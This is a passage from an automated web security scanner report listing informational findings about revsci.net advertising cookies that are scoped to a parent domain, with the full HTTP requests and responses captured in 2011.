Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv/9FEJUSpn5l6pVFGFtoFPcNiZQXEmRfNYGCemmjfgrpYXr01sQ9tiT8EX00BRV94CRgAU+Cx+A1UyfYZNMCAyWVxgaMJPGkf8TFIlYXlki3Za8SZrHQcbAAHtzBKuHN1WnZO/FADdFtbQ4tTcDTv+/Xlt+BhYtDIVpaeByA0iypN5Q1/ovDhNl5rC75OYkwLvQ+PNALghcwtRNb5XQkE/e736rwI59LV+Lxcr6hqYtoSa0Y7NmcqmxdooVTFg8d9OkXAe/nA0Pv09oobrkR1sPhh4bpWCMXXgcnIXJhRZL+WmuuhUNICfUwoHrSnfNd7INRqbEKlrkyI4ranyBdGGDnfpMhZ4d70tSL78Wzix96AC37O8TjtMhOyNvZtMEqM3Vu430adx2g6NcgghcyBCd/4ZD11sEyYhtAVGsixJ9D/eNU5p5xq8uXL62d3u/+3GJw/j/OmHcrDVGO1Ets+Ml/G2x8IfPGrQ6BXlnVPkZ0Yb0DLjAe/Mlto3nTqXnqLZJtNb+TCCZgNCcA4D1t8TtjhkqPedaX74wLR/4PIrwHSr9l/ZtT0andQyxYusw/hmtZVIFFrzRGki+nKKU+DfZzsBVISF3gY636fNNZGUnxnT+qoUbza+WQ5nu4y+xgvM3rX0KCpaI9y4j+M2HLlBBe0Y66nyTZhgnberGlUfyGAREOYcmLefKqQ8vnPRH34tstpiLW8fVZymfgXFnOrHvEfIkajgy5PFOicYxMmRwPaxj3cxb/4LuZmv/rC5Pk0o5fWR77B8xzpw4B3wE0nnO1GT7gpH7oiyCu3p7BKVkMayCiP7wU3LSaSVJMh6rwvMlxBnhqJQ7I8o2/N/s/zBI3sOWJ1RjDG/QWxgo2bY9PHDrgr9EMCvN2YESZZxIO3sQnvBDpmvkmA9SYEb4uffYOulKcagBZoDKaBk3xg90muYx0Yn5GskyQmwvnxYGwPebHzI8jqsMy3/N5N7mdMOlZs+AzRNfDK8eQetzUS3jUEu7evMgTUnNpAw5xNxCd7mkwJCzD3R2FhhUMXPIJpvkl5LUakIjQnacYISFbBXQ5VKvjBs3ArBfhOvf1PaJ7iQIYF9u8LFr5BnIQIb+A6fps+n3volzB+ugnGU8HH1EP+e0NI1L2C42QJVScul2+QNW4lkxtS0gX5W1qspjaE+hy9HSkd9; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 384

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126'];
if(typeof(D
...[SNIP]...

13.54. http://pix04.revsci.net/F09828/a4/0/0/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

13.55. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I07714/b3/0/3/1008211/954068462.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOE/F7gMQlrWdY9siSkqZE680dIsPyzLv7mCqBpJakqVFftDs8Pd8XH9p7LJOwoH+goYpPfri7ZTBvzBVf7SOFPaRj1HOKpjRvpAKtGje2Y3H4h//EkEw6Msyj40HEwS7e/06Sy9s4k8kNE/WoHW1C3nb6NhUPrzhVTUm0po5pvG/x2yipyOcnl8CyX8Ph5nifpkExZWQ1HO8VTJph99aLekgIJGcAHFOegq+bzrVdQKxKeDFmBZN; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
rtc_UUza=MLs38KNKcS5r5tIYsrgdBK11VmsPcJHEjh8FB4XxHMaJAW/yCsbueTOkM2I7/XCjGGDtu+H38Zi6DHtu6Jz2s/guplcWn9G+mKtXFNPD/GT0al2wX2OBBe5NhmRfx9Rtvi6+OYVG6B1HLTS/fubkWk/2Wr78IBEZfcQxbxZvLdlubczCSL5h9Xp2CZ5Ijou+QGBVYRzisz4PopFv7MEjzqqaMCMg8LhoUIRHIs+zFGlNMSXDVqlePNr2XGUHXlldp1DKQuzQ5FdkU0lSEeGT/NPMnqL/Dbs5RFmVr7vZtTHuI+MRsgjd+zdbPV0cdxij9ktIroXW6Um2lEkmDOqyF3jm+2i0BB6G3+YQcPhnogcX7yYHIAvY5J9uDXxtglmIJZmS+ZIPR8fGb8dBgNdnl1XQT5gJYx8ZGap1GsVz5R14Aosznra92XixAfy5jHEePiNeZRRs1lXlJ4UtJPzvobtA/LLyl1ewk7GYvp999XJW; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/954068462.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_Dp_w="MLtXrlEusS9roBD3MlioxsCF6sySUVfem3F3zgv5P2X5MNBz5u04Ie9ppXXLTNPCB8Rrdx21qWPBSMqTbO6HYwOXUoBWKm6QOeSxGzfdhIMqVpPipkbUdAcWiVJ3Cs4I2Yz+rbqR1Q7yacm6q3MhEYBqZRDVrlm4AttvllcDwygEvV4iEIdzZhutP2QInp8og4OZ+W7c9zRxnI1sZ/yaqTmrtGc5HBE/XipCAr9aBtIFqw2goGxwgKUjJ3So+TW+W8qspjGdsu4/t7OLlio5pcMR2nwhP2uILD3LHj7kAvztOgnn3xZhVKkQvKI+Vg=="; rsi_us_1000000="pUMdJUmDOAIc1Q0ENSCDHVk4pjdq6b0TLtFdvnHKs0j7W4YV0vweki0TaUSmsSdBEZG4Enk584PQv5/vjBqnjvbwpkJAobtE4AP9z/0tXARcQ7ZZijwyIuTEFzcVEMLj3elLwqn/hlqZfkJgsqqK2qxsvxRys6JyaqJ9LAtcxtGJYC+OHMgq6r+wXwzYpuZ4cdvHF9REShwDNkt9b46MQRiRbAAAUOolwwBR6iHLNfgbWGjfFCw9vrOYPyp0bm2NgxIGZYnntLNsQPAd1frsowREiumlBdBctjsBSPfpMdwOxHFh8fMVgEe0q6vZcmheSykvCAoVGRpIu4K5gUqyF2qmq3R8T/t0ZpRi+jIz9mO/PSWtabscmfQQTTUyFzjAcip3jsDYyqQdl4l+0gDVMlxWN8+ALpubLzgPufmKORSg5ZPV4T1sblaP66xnaIJD6DDyLlE8anHysteylSzQ+dZIG0Kr5glQARAqp4NJwTzOjmrj4wFQ/mt30K0RyTpXC+k5uOXxPSRh9tgFdQOaVED0iTNnqa4JSVf+r5/RnL55Ycre4AJZ62QUPNU1r8PZazfaHpQRo4hfBUOiy47VxRcrwkUU8TBN1sF1mFwnVQLNOTzo3iVaWpfL8TyQ2SwKJ4aZQI5U/KNDojZwOfVE8dq4OI/WVxAPVwjaGCRq1tUsGo7R9eMlJjP8d1HWyA5NRiL/oo9Ig0XWMPIeqH2+OvxWiGIHUzhUe3gtByb0N725e6mgtuIuvLXEl5oDRy/ydo6M5uSntsoIHJXCBmVyclUzOdG8ZHIwnqInio4tJdYSfUGV4TankJNlBeg6RFi7IQu0to3CNm5WuGkOpe4Se7aNUuAz/A9ZNu+vBbRxNMh+5LsffYa51MqtkJuw7UU="; rsi_segs_1000000=pUPFeknF7gMYF1JYvJuXopO09a420jnOKLfHaVwoHNgwnmKsDTMJ3YH2aKvvUGIZ/ovnvZQpXcibMPPd7DErWPCzXoGmdIFqM4kSkqVY4gx2tb55vuBU6xY7+voByvYres1JgvnVBK1tOVdIEKTEh5zeeSJ3c6azfwNbivbJs+KlZnQ2c6UCUEdoIjrmao/eYXYcDa0NTi8RdBX3aGM8/aQQvvQ=; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ouyE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TPFo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JoIq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V3Sj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Al2u=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KlBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WxDm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8lxm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0xhU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_B35h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9v7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Dl2X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NNGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_T7TS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e1UB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hoxY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CSVk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c-yi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P-Tx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YMHi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YauM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_n6Bj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_10Pc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i0t6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0HN7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OOxT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CYvE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P_wA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fqlT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-bS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gU3y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0M60=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4XRF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mKsM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D7_n=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xK1r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wv7Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aMQ6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hCqO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_u2bt=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cDdJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_F9rS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cy72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tqOJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vkQg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dPEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lQ5E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HP5F=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_afGD=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_99wg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Otdj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PS9L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_z5uu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LYEa=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_g7em=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bnh8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_j85P=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pGwN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zwtV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_11QG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lRqF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KNEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yjL1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-YQM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IcRj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Ca17=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i8cQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6ZG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spY_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OMEF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JxrH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wxnV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DeFS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DPB9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Eqv9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lnFX=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sT2D=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_miei=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hsco=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Cr86=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D9Sw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WIU4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qxGy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3y2w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4xbP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G1y2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwHO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_x2n2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-Lvu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_llAU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
